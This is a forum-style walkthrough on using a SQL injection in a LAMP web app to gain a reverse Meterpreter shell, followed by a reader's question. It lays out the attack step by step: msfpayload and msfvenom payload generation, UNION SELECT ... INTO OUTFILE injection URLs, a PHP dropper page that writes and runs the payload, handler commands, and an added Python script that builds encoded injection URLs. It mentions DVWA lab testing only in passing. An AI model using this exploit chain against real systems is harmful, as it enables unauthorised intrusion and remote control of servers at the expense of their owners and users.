Anyway, I was trying to find a good walkthrough on the web for getting a reverse shell from a SQL injection vulnerability on a LAMP system and couldn't find one (unless my google-fu sucks), so here is one I have put together. It assumes a fairly standard configuration: MySQL and Apache each run as their own unprivileged account (not root); the database account the web app connects with has the MySQL FILE privilege, which is what INTO OUTFILE requires; the mysqld OS account can write to the web root and to /tmp; and secure_file_priv is empty. On newer MySQL builds secure_file_priv defaults to a single export directory or to NULL (disabled), which stops this technique cold, so check with SHOW VARIABLES LIKE 'secure_file_priv' and SHOW GRANTS before you start. INTO OUTFILE also refuses to overwrite an existing file, so pick fresh file names on every attempt.
- First you need to find your SQL injection vulnerability. :) For this technique it has to be one where you can append a UNION SELECT, and you need the column count of the original query so MySQL accepts the UNION. The page does not have to display the result: INTO OUTFILE writes the file on the server regardless of what the application does with the rows.
- Next, we need to generate our payload. We will use msfpayload for this (the X switch produces an ELF executable) and base64 encode it so the binary survives the trip: INTO OUTFILE escapes NUL, tab, newline and backslash bytes, which would wreck a raw ELF, and a URL cannot carry them at all. We encode twice here because the PHP page further down decodes twice; note that the second pass does not buy anything against bad characters, since base64 output still contains '+', '/' and '=' no matter how many times you apply it, so URL-encode the string when you send it (a bare '+' in a query string is decoded as a space). Change the LHOST option to match your local IP. You can also specify a port with LPORT=<port>. msfpayload was later folded into msfvenom; the equivalent there is msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.20 -f elf.
- # msfpayload linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.20 X | base64 | base64
- You will then get your base64 encoded string, wrapped at 76 columns. Copy it and join it into a single line: PHP's base64_decode() ignores the newlines anyway, but a URL will not carry them.
- We now need to send it to the remote server through the SQL injection vulnerability. The best place to create the file is the /tmp directory on the remote server: the mysqld account has to be able to write it and the Apache account has to be able to read it, and /tmp normally allows both. (If the two daemons run under systemd units with PrivateTmp=true, each one sees its own private /tmp and the file PHP looks for will not be there; pick another directory both can reach.) Remember to URL-encode the whole injected value, or write the string as a MySQL hex literal (0x...) instead of a quoted string, which sidesteps quotes and bad characters altogether.
- http://www.bad.site/vulnpage.php?id=-1 UNION SELECT 'ZjBWTVJnRUJBUUFBQUFBQUFBQUFBQUlBQXdBQkFBQUFWSUFFQ0RRQUFBQUFBQUFBQUFBQUFEUUFJQUFCQUFBQUFBQUFBQUVBQUFBQQpBQUFBQUlBRUNBQ0FCQWk0QUFBQXVBQUFBQWNBQUFBQUVBQUFNZHRUUTFOcUFtcG1XSW5oellDWFcyakFxQUVVWm1nUlhHWlRpZUZxClpsaFFVVmVKNFVQTmdGdVp0Z3l3QTgyQS8rRT0K' INTO OUTFILE '/tmp/mettemp'
- Next we need to create a PHP page that base64 decodes the payload into a new file the Apache user can execute. This page reads the file with the base64 encoded string we wrote a moment ago, decodes it twice (matching the encoding), writes a new file in /tmp, chmods it so it is executable, then runs it. Mode 700 is enough for the chmod; 777 would also let every other local user overwrite your binary before it runs. Two things to know: system() blocks until the payload exits, so the HTTP request stays open for as long as the Meterpreter session is alive, and if system() is listed in PHP's disable_functions the call is refused (a warning lands in the error log), in which case try exec(), passthru() or proc_open().
- http://www.bad.site/vulnpage.php?id=-1 UNION SELECT '<?php $myfile = "/tmp/mettemp"; $myfile2 = "/tmp/metexec"; $fh = fopen($myfile, "r"); $data = fread($fh, filesize($myfile)); fclose($fh); $fh2 = fopen($myfile2, "w"); fwrite($fh2, base64_decode(base64_decode($data))); fclose($fh2); chmod($myfile2, 0700); system($myfile2); echo "pwned"; ?>' INTO OUTFILE '/var/www/html/rev_shell.php'
- On your local system, start the handler for the reverse shell before you trigger the page; the stager connects back as soon as it runs, and you will miss the callback if nothing is listening. (msfcli has since been retired; with a current Metasploit the same thing is msfconsole -x "use exploit/multi/handler; set payload linux/x86/meterpreter/reverse_tcp; set LHOST 192.168.1.20; run". Set LPORT as well if you changed it in the payload.)
- # msfcli exploit/multi/handler payload=linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.20 E
- Now all you need to do is browse to the rev_shell.php page you created earlier and enjoy your reverse Meterpreter shell. The browser will sit waiting on the request for as long as the session runs; that is system() blocking, not a failure.
You will only have the privs of the apache user, but then you can continue with privilege escalation for more fun.
If you want to test this out in a lab environment, you can use the Damn Vulnerable Web App (DVWA) in the Web Security Dojo VM and a BackTrack VM.
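As an added example that is not part of the original post, the script below builds the same two injections as the steps above but writes the value as a MySQL hex literal instead of a quoted string and then percent-encodes the whole parameter, so nothing in the GET request depends on quotes or on base64's '+', '/' and '=' surviving. The host, paths and parameter name are the illustrative ones used above, the column count is a parameter you fill in from your own injection, and the payload bytes are a constructed stand-in for msfpayload/msfvenom output.

```python
# Added example, not code from the original post. Builds the two
# UNION ... INTO OUTFILE injections with hex literals and URL-encodes them.
# Host, paths, parameter name and the payload bytes are assumptions.
import base64
from urllib.parse import quote


def hex_literal(data: bytes) -> str:
    """MySQL reads 0x4142 as the string 'AB', so the value needs no quotes."""
    return "0x" + data.hex()


def build_union(column_count: int, payload_column: int,
                value: bytes, outfile: str) -> str:
    """Build `-1 UNION SELECT ... INTO OUTFILE '<outfile>'-- `.

    column_count must equal the number of columns in the page's own SELECT,
    otherwise MySQL rejects the UNION. Padding columns use '' rather than
    NULL: INTO OUTFILE writes NULL as \\N, and 'N' is a valid base64
    character that would corrupt the staged file. Padding columns still add
    tab separators, which PHP's non-strict base64_decode() silently drops.
    The trailing `-- ` comments out whatever followed the injection point.
    """
    if not 1 <= payload_column <= column_count:
        raise ValueError("payload_column must be within 1..column_count")
    cols = [hex_literal(value) if i == payload_column else "''"
            for i in range(1, column_count + 1)]
    return f"-1 UNION SELECT {','.join(cols)} INTO OUTFILE '{outfile}'-- "


def build_url(base: str, param: str, injection: str) -> str:
    """Percent-encode everything; a bare '+' would otherwise become a space."""
    return f"{base}?{param}={quote(injection, safe='')}"


def dropper_php(b64_path: str, exec_path: str) -> bytes:
    """PHP that decodes the staged file, makes it executable and runs it.

    Same idea as the rev_shell.php page above, written for a single base64
    pass, with file_put_contents() (truncating) and mode 0700.
    """
    return (
        "<?php "
        f"$d = base64_decode(file_get_contents('{b64_path}')); "
        f"file_put_contents('{exec_path}', $d); "
        f"chmod('{exec_path}', 0700); "
        f"system('{exec_path}'); ?>"
    ).encode()


def unsafe_chars(url: str) -> set:
    """Characters left in the parameter value that a browser, proxy or WAF
    could mangle or block: quotes, base64 punctuation and whitespace."""
    value = url.split("?", 1)[1].split("=", 1)[1]
    return set(value) & set("'\"+/= \t\n")


if __name__ == "__main__":
    # Constructed stand-in for the ELF that msfpayload/msfvenom would emit.
    payload = b"\x7fELF" + bytes(range(256))
    staged = base64.b64encode(payload)          # one pass is enough here
    first = build_union(1, 1, staged, "/tmp/mettemp")
    second = build_union(1, 1, dropper_php("/tmp/mettemp", "/tmp/metexec"),
                         "/var/www/html/rev_shell.php")
    for injection in (first, second):
        url = build_url("http://www.bad.site/vulnpage.php", "id", injection)
        assert not unsafe_chars(url)
        print(url)
```

Run it, request the two printed URLs in order with the handler already listening, then request /rev_shell.php. Because the dropper here decodes once, stage the payload with a single base64 pass rather than the double pass used above.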
I’m asking myself, why two steps? Couldn’t you just write a small php reverse shell script and transfer that with INTO OUTFILE? That should spare one step, shouldn't it?